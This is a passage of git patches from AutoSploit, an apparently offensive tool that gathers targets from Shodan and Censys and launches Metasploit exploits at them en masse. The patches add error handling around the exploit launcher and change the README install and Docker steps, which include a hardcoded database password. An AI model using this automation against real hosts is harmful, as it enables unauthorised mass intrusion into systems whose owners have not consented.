@@ chmod +x install.sh ``` ## Dependencies +_Note_: All dependencies should be installed using the above installation method, however, if you find they are not: AutoSploit depends on the following Python2.7 modules. diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 55425a2..44e55a4 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -26,7 +26,7 @@ def optparser(): parser = argparse.ArgumentParser( usage="python autosploit.py -[c|z|s|a] -[q] QUERY\n" - "{spacer}[-C] WORKSPACE LHOST LPORT [-e]\n" + "{spacer}[-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH\n" "{spacer}[--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH\n" "{spacer}[--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT".format( spacer=" " * 28 From 54ec23823ebdbf6987c1da1356128dea91d03ec5 Mon Sep 17 00:00:00 2001 From: ekultek Date: Tue, 3 Apr 2018 15:21:10 -0500 Subject: [PATCH 30/31] added a try, except block --- lib/cmdline/cmd.py | 23 +++++++++++++---------- 1 file changed, 13 insertions(+), 10 deletions(-) diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 44e55a4..c5b8185 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -162,13 +162,16 @@ def single_run_args(opt, keys, loaded_modules): keys["censys"][1], keys["censys"][0], opt.searchQuery, proxy=headers[0], agent=headers[1] ).censys() if opt.startExploit: - hosts = open(lib.settings.HOST_FILE).readlines() - if opt.whitelist: - hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) - lib.exploitation.exploiter.AutoSploitExploiter( - opt.msfConfig, - loaded_modules, - hosts, - ruby_exec=opt.rubyExecutableNeeded, - msf_path=opt.pathToFramework - ).start_exploit() + try: + hosts = open(lib.settings.HOST_FILE).readlines() + if opt.whitelist: + hosts = lib.exploitation.exploiter.whitelist_wash(hosts, whitelist_file=opt.whitelist) + lib.exploitation.exploiter.AutoSploitExploiter( + opt.msfConfig, + loaded_modules, + hosts, + ruby_exec=opt.rubyExecutableNeeded, + msf_path=opt.pathToFramework + ).start_exploit() + except KeyboardInterrupt: + lib.output.warning("user aborted scan") From 8a1c05a49d23add552bf43db109f1f912ea02377 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Tue, 3 Apr 2018 15:35:59 -0500 Subject: [PATCH 31/31] minor update to the README --- README.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 1e35ae6..71cbffd 100644 --- a/README.md +++ b/README.md @@ -33,7 +33,8 @@ Installing AutoSploit is very simple, you can find the latest stable release [he sudo -s << EOF git clone https://github.com/NullArray/Autosploit.git cd AutoSploit -pip2 install -r requirements.txt +chmod +x install.sh +./install.sh python2 autosploit.py EOF ``` @@ -43,6 +44,9 @@ EOF ```bash sudo -s << EOF git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit +chmod +x install.sh +./installsh cd AutoSploit/Docker docker network create -d bridge haknet docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres